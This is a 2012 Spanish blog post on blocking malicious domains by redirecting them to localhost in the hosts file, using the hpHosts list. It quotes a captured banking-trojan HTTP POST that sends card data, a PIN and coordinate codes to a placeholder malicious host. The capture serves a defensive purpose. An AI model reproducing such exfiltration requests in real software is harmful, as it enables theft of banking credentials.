jueves, 31 de mayo de 2012

Protección a nivel local, archivo hosts

Compartir este artículo:

Proporcionar protección a nivel local tendría que ser una de las principales medidas que se deberían de implementar en los equipos.

Una de las cosas bastante eficaces que se pueden es que a ciertos dominios/IP no nos podamos conectar, así nos protegeremos. ¿Como se consigue esto? Pues haciendo que dichas peticiones a ciertos sitios siempre vayan 127.0.0.1 es decir, a localhost.

¿Esto de que nos libra?

Pues nos libra de que si navegamos por ejemplo por páginas webs legítimas, que contienen por ejemplo un iframe a un “conocido” host que contiene malware la conexión no se realizará.

Otro caso es por ejemplo el de troyanos que se dedican por ejemplo a pedirte los datos bancarios “por seguridad”. Obviamente estos troyanos lo que buscan es engañar al usuario para que introduzca sus datos bancarios y poder enviarlos a un host destino.

Si miramos ese tipo de trazas con Wireshark, veríamos algo del tipo

POST /images/check.asp HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 962Host: DOMINIO_MALICIOSOAccept: text/html, */*User-Agent: Mozilla/3.0 (compatible; Indy Library)1=45678976&2=1234&3=1234&4=47897654&5=4567&6=5467&7=5879654774587741&8=06%2F14&9=887&10=7188&11=145%2D4564&12=146%2D5646&13=147%2D5456&14=148%2D4564&15=149%2D5645&16=150%2D6156&17=151%2D1894&18=152%2D8918&19=153%2D9189&20=154%2D1891&21=155%2D8984&22=156%2D5445&23=157%2D6156&24=158%2D1561&25=159%2D5615&26=160%2D6118&27=161%2D9948&28=162%2D9489&29=163%2D1891&30=164%2D8918&31=165%2D1891&32=166%2D8189&33=167%2D1891&34=168%2D8918&35=169%2D9189&36=170%2D1891&37=171%2D8918&38=172%2D1891&39=173%2D1998&40=174%2D1891&41=175%2D8918&42=176%2D9115&43=177%2D1561&44=178%2D1156&45=179%2D1565&46=180%2D1561&47=181%2D5619&48=182%2D1984&49=183%2D8948&50=184%2D9189&51=185%2D1891&52=186%2D9919&53=187%2D8189&54=188%2D1891&55=189%2D8918&56=190%2D9189&57=191%2D1189&58=192%2D1891&59=193%2D8918&60=194%2D9189&61=195%2D8918&62=196%2D9891&63=197%2D8918&64=198%2D9189&65=199%2D1981&66=200%2D8918&67=201%2D9189&68=202%2D1981&69=203%2D8918&70=204%2D9811&71=manodacaixa%40gmail%2Ecom&HTTP/1.1 200 OKConnection: keep-aliveDate: Tue, 22 May 2012 12:40:57 GMTServer: Microsoft-IIS/6.0MicrosoftOfficeWebServer: 5.0_PubX-Powered-By: ASP.NETContent-Length: 0Content-Type: text/htmlSet-Cookie: ASPSESSIONIDASSSCADB=BIJLMGIBAJPPPDFIDBPMKBJH; path=/Cache-control: private

Todo el “churro” que se envía son los datos que el usuario ha rellenado sobre su tarjeta, su PIN etc…

Si el HOST destino, ya se conoce como malicioso los datos nunca se enviarían, es decir, nos ofrece protección en la navegación y en el envío de datos a URL/Ip maliciosas.

Otro tipo de troyanos, lo que hacen es, una vez que han infectado la máquina se descargan mas binarios de su servidor que les hace de panel de control (C&C).

Se podría mitigar también redirigiendo las peticiones a localhost.

Y es  por eso, por lo que proyectos como hphosts nos ayudan en esta tarea.

Descargamos el archivo de aquí

¿Que tenemos en este archivo?

C:\Users\seifreed\Downloads\hphosts>wc -l HOSTS.txt183792 HOSTS.txt

Tenemos  183792 entradas repartidas entre IP’S y URL que son de carácter malicioso, de manera que si intentan conectarse fallarán.

Y eso es todo por hoy ;)

No hay comentarios:

Publicar un comentario en la entrada

Related Posts Plugin for WordPress, Blogger...